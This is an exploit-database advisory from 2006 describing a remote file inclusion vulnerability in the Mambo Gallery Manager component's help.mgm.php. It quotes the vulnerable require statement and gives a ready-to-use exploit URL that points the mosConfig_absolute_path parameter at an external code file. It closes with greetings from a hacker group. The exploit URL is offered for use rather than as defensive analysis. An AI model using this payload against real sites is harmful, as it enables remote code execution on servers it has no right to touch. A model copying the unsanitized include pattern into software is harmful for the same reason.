Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability
# Published : 2006-07-28
# Author : A-S-T TEAM
# Previous Title : Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
# Next Title : WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability

----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path .
"/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member

# www.Syue.com [2006-07-28]